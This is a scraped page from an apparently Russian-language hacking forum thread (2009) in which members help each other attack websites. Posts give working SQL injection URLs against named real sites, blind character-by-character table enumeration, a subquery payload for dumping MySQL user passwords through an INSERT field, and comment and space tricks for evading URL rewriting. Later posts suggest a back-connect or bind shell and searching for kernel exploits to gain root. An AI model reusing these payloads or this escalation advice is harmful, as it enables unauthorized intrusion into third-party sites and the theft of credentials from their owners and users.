Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    618
    Likes Received:
    309
    Reputations:
    27
    Ты закрываешь коментом свой запрос вот он и проходит, вобше уязвимый параметр у нас в limit:
    2Byrger это не слепая, переводить можно и так(php)
    echo "0x".bin2hex("здесь пишем чего хотим перевисти");
     
    #6001 AkyHa_MaTaTa, 18 Mar 2009
    Last edited: 18 Mar 2009
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,752
    Likes Received:
    1,044
    Reputations:
    339
    https://forum.antichat.ru/showpost.php?p=1151651&postcount=657
     
  3. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    368
    Likes Received:
    460
    Reputations:
    93
    Для тех, кто не знает кто такой даниельдефо - погуглите =)

    А инъекция после лимита возможна. Более чем )
     
  4. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,043
    Likes Received:
    1,138
    Reputations:
    350
    s_p_a_m
    Там INSERT
    http://www.zork.name/?view=2)+and+substring(version(),1,1)=(5

    вот перебор, если нужен
    http://www.zork.name/?view=2)+AND+ascii(lower(substring((select+table_name+from+information_schema.tables+limit+17,1),1,1)))<(53

    ===============================
    Давай посмотрим реализацию :) Например тут:

    http://www.ngo-monitor.org/articles.php?article_type=op-eds&type=whatsnew&limit=140'

    http://www.ngo-monitor.org/articles.php?article_type=op-eds&type=whatsnew&limit=140,2--+

    Ну или твой вариант с удовольствием посмотрю. С "ORDER BY", что-бы всё как положено :)
     
    #6004 Kakoytoxaker, 18 Mar 2009
    Last edited: 18 Mar 2009
  5. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    131
    Likes Received:
    6
    Reputations:
    6
    INSERT? или есть еще что интересного?
     
  6. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    131
    Likes Received:
    6
    Reputations:
    6
    Да я то же хочу посмотреть!!!!!
     
  7. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    368
    Likes Received:
    460
    Reputations:
    93
    Если в запросе есть ордей бай то нельзя. Ну мне нужно было конкретизировать, сори что ввел вас в заблуждение :)
     
  8. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,156
    Likes Received:
    96
    Reputations:
    -25
    http://pastebin.com/m19eaa637


    Переменная form_number не проходит фильтрацию...Но я так понял,что даже если она и уязвима,то вывода не будет ?

    PHP:
    $result mysql_query("INSERT INTO Users
        (firstname,lastname,school_id,description,email,username,password)
        VALUES
        ('
    $firstname','$lastname','$school_id','$form_number','$email','$username',
        Password('
    $password'))");
    В school_id только XSS...

    В остальных переменных режутся хтмл и пхп strip_tags() функцией...не знаю,что и делать.Что касается проверки длины полей хтмл формы,то проверка идёт только на уровне приложения,а сервер отдыхает...Хотя бы поле password. Может,кто найдёт здесь sql inj или щё что-нибудь интересное ?

    ПЫСЫ: Если что, то приму минусы в подарок,если написал не туда,куда полагается...
     
    #6008 Велемир, 18 Mar 2009
    Last edited: 18 Mar 2009
  9. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    554
    Likes Received:
    26
    Reputations:
    -4
    HTML:
    http://www.gmpr.ru/news_item.php?id=699'

    А дальше не воспринимает....
    HTML:
    http://www.gmpr.ru/news_item.php?id=699+group+by+400--
     
  10. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    510
    Likes Received:
    139
    Reputations:
    25

    если $form_number уязвима и MySQL поддерживает подзапросы + кавычки не слешируються то можешь зделать своеобразный вывод в пользовательских профиле(естественно это имеет смысл еслу тебя есть доступ к данным пользователя), то есть что то типо такого:

    $form_number = 1',(select concat_ws(0x3a,user,password,host) from mysql.user limit 1),'dodik','pass' /*

    потом ишешь пользователя dodik и по идее у него в мыли будет лежать наш подзапрос.
     
    1 person likes this.
  11. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    618
    Likes Received:
    309
    Reputations:
    27
    там же видно по ошибке что переменая вставляеться в кавычке:
    PHP:
    http://www.gmpr.ru/news_item.php?id=699123123'+union+select+1,2,concat_ws(0x3A,user(),@@version,database()),4,5,6,7,8,9,10--+
     
    #6011 AkyHa_MaTaTa, 18 Mar 2009
    Last edited: 18 Mar 2009
  12. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    554
    Likes Received:
    26
    Reputations:
    -4
    Если в ошибки от скули приходит с + то как поставить пробел?

    PHP:
    ov/'+group+by+1--/'    
    И она не воспринимает --
     
  13. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    618
    Likes Received:
    309
    Reputations:
    27
    Когда в MySQL используешь комент -- то после него надо ставить пробел --+, судя по всему скуля у тебя в чпу можешь попробывать использывать /**/ вместо пробелов, а в качестве комента закрываюшего оставшийся запрос - #( беда с # в том что браузер может воспринять # как анкор поэтому обычно вставляют %23 ) и если у тебя логика(считай регулярка) чпу требует что бы переменная которая вставляеться в запрос находилась между // то у тебя например когда ты делаешь вот так : /**/order/**/by/**/1#/(потому как пробелы не urldecode то и %23 наверно так и останиться %23) в качестве значения переменой пойдет ** в запрос, можешь попробывать %20 вместо пробелов(хотя если производилось urldecode запроса то и + могли бы пройти), вообшем с чпу не всегда все просто и понятно, единственым решением являеться прямое обрашения к скрипту с передачей ему нужных значений как это делает чпу что не всегда возможно по ряду причин.
     
    1 person likes this.
  14. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    554
    Likes Received:
    26
    Reputations:
    -4
    PHP:
    ov/'%20%23/**/+--+group+by+1--+/'
    PHP:
    ov/'+group+by+1%23/'    
    Вообще не как не пускает....а запрос выгледит так..

    PHP:
    SELECT `ID`, `NameFROM `menuWHERE roup_ID` = '2' AND `Active` = '1' AND `URL` = '/arti....erov/'/**/group/**/by/**/1+--+/'
    В ошибке он ругается на /' тоесть похоже что запросе не прерывется (MySQL стоит...)
     
  15. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    618
    Likes Received:
    309
    Reputations:
    27
    ну ты же видешь что после -- у нас идет + а должен быть пробел, попробуй так '/**/group/**/by/**/1/*/, и если подерживаеться union - '/**/union/**/select/**/1,2/*/ может последний слеш и не нужен, судя по запросу если он действительно полный то можно обойтись и вообше без коментов
    '/**/union/**/select/**/1,2/**/'/

    SELECT `ID`, `Name` FROM `menu` WHERE roup_ID` = '2' AND `Active` = '1' AND `URL` = '/arti....erov/'/**/union/**/select/**/1,2/**/'/'

    а вообше вылаживай линк или в пм раз сайт пентагона под прицелом.
     
    #6015 AkyHa_MaTaTa, 19 Mar 2009
    Last edited: 19 Mar 2009
    3 people like this.
  16. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    131
    Likes Received:
    6
    Reputations:
    6
    не sql injec

    так же как и php и asp
    sql injec - проблема не интерпритации языков а проблема запросов (в основном)

    google рулит
     
    1 person likes this.
  17. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    413
    Likes Received:
    153
    Reputations:
    19
    Imperou$, естественно прав нехватает. повышай.
     
    1 person likes this.
  18. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    131
    Likes Received:
    6
    Reputations:
    6
    2 inperous

    Не хватает прав. Тут как вариант - бекконект или бинд шелл - локальный сплойт что бы поднятся до рута
     
  19. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    88
    Likes Received:
    35
    Reputations:
    0
    ph1l1ster
    Как?
     
  20. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    413
    Likes Received:
    153
    Reputations:
    19
    id - покажет права
    uname -a - версию ядра

    google.com - ищи сплойты под версию ядра

    есть много способов по поднятию прав.

    один из них - https://forum.antichat.ru/nextoldesttothread17443.html
     
    1 person likes this.
Loading...
Thread Status:
Not open for further replies.